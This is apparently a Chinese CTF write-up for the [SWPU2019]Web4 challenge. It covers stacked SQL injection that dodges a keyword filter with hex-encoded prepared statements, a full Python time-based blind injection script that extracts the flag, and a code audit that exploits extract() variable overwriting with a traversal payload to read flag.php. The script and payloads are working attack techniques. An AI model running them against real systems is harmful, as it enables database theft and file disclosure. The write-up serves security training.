[SWPU2019]Web4

[SWPU2019]Web4

PDO注入（堆叠注入）

• 首先发现一个登录框，但是不能注册
• 进行抓包，发现json数据格式，猜测可能是sql注入或者xxe漏洞
  
• 输入 ’ 报错，但是输入"或者‘ “ 不报错->猜测为堆叠注入[[mysql-堆叠注入]]
  名称处加单引号报错，加双引号不报错，加单引号和分号不报错，说明存在堆叠注入。
• 因为过滤了很多关键字，尝试使用预处理语句加hex编码绕过

set @sql=concat('sele','ct * fr','om Fl','ag');
prepare xxx from @sql;
execute xxx;
//把'sele','ct * fr','om Fl','ag'联合放入@sql中
//prepare aaa from @sql；从@sql调制东西放入aaa中；//
//EXCUTE aaa;执行aaa;

payload

import requests  
import time  
import json  
  
def str_to_hex(str_str):  
a=''.join([hex(ord(c)).replace('0x', '') for c in str_str])  
return '0x'+a  
  
  
url = 'http://467789dd-f8c9-4666-878e-bb49efded6fd.node5.buuoj.cn:81/index.php?r=Login/Login'  
flag = ''  
payloads="admin';set @a={0};prepare test from @a;execute test;"  
# set @a=0x73656C65637420736C65657028313029;prepare test from @a;execute test;  
  
for i in range(1,1000):  
high = 127  
low = 0  
mid = (low + high) // 2  
while high > low:  
# payload=f"select(group_concat(table_name))from(infoRmation_schema.tables)where(table_schema)like(database())"  
# payload = f"select if(ascii(substr(database(),{i},1))>{mid},sleep(2),1)" #查库名  
# payload = "select if(ascii(substr((select flag from flag),{0},1))={1},sleep(3),1)" #查库名  
# payload = f"select if(ascii(substr((seleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)like('ctf')),{i},1))>{mid},sleep(2),1)#" #查表名  
# payload = f"select if(ascii(substr((seleCt(group_concat(column_name))from(information_schema.columns)where(table_name)like('flag')),{i},1))>{mid},sleep(2),1)#" #查列名  
payload = f"select if(ascii(substr((select(flag)from flag),{i},1))={mid},sleep(3),1)#" #查数据  
# payload = f"1/**/and/**/if(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid},sleep(2),1)#" #查所有数据库名  
# payload=f'1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid})#'  
# data = {  
# "id":payload  
# }  
# proxies = {'http': '127.0.0.1:8080'}  
# print(payload)  
print(payloads.format(str_to_hex(payload)))  
data={  
"username": payloads.format(str_to_hex(payload)),  
"password": "12345"  
}  
data=json.dumps(data)  
# print(data)  
time.sleep(0.1)  
last = int(time.time())  
response = requests.post(url=url,data=data)  
now = int(time.time())  
if now - last > 1.5 :  
low = mid + 1  
else :  
high = mid  
mid = (low + high) // 2  
if low != 0 :  
flag += chr(int(low))  
else:  
break  
print(flag)

代码审计

• 首先查看控制器的BaseController.php，根据名字是基类
• 发现，变量覆盖函数extract()，对第二个参数进行覆盖，所以要得到调用该函数，且第二个参数可控的地方
  
• 直接ctr+shift+f，搜索这个函数出现的地方，进行查找，发现只有控制器下的UserController.php有满足条件的
  
• actionList函数下的还经过了一个类，估计不行。先看actionIndex，发现他对于的页面是userIndex提供的，进去看看
• 这里会输出文件的base64加密的数据，我们可以对img_file进行变量覆盖，因为ListData变量来源于$_REQUEST，可以直接使用请求传入变量
  
• 来个路由规则

// 路由控制跳转至控制器  
if(!empty($_REQUEST['r']))  
{  
   $r = explode('/', $_REQUEST['r']);  
   list($controller,$action) = $r;  
   $controller = "{$controller}Controller";  
   $action = "action{$action}";  
  
  
   if(class_exists($controller))  
   {  
      if(method_exists($controller,$action))  
      {  
         //  
      }  
      else  
      {  
         $action = "actionIndex";  
      }  
   }  
   else  
   {  
      $controller = "LoginController";  
        $action = "actionIndex";  
   }  
    $data = call_user_func(array( (new $controller), $action));  
} else {  
    header("Location:index.php?r=Login/Index");  
}


1. 首先检查是否存在`$_REQUEST['r']`，即请求中是否包含了路由参数。
2. 如果存在路由参数，则将其按照`/`进行分割，得到控制器和方法名称。
3. 然后将控制器名后面加上"Controller"，将方法名前面加上"action"，以符合通常的命名约定。
4. 检查是否存在对应的控制器类，如果存在，则继续判断是否存在对应的方法。
5. 如果找到了对应的控制器和方法，就准备执行相关操作。
6. 如果找不到对应的方法，则默认执行`actionIndex`方法。
7. 如果找不到对应的控制器类，就将控制器设置为`LoginController`，方法设置为`actionIndex`。
8. 最后，使用`call_user_func`函数调用相应的控制器和方法，并将结果存储在`$data`变量中。
9. 如果请求中没有包含路由参数，则将页面重定向到 `index.php?r=Login/Index`。

• 所以这里构造：路由为index.php?r=User/Index
• 所以最后
  payload

GET: index.php?r=User/Index
POST: img_file=/../flag.php

进行base64解码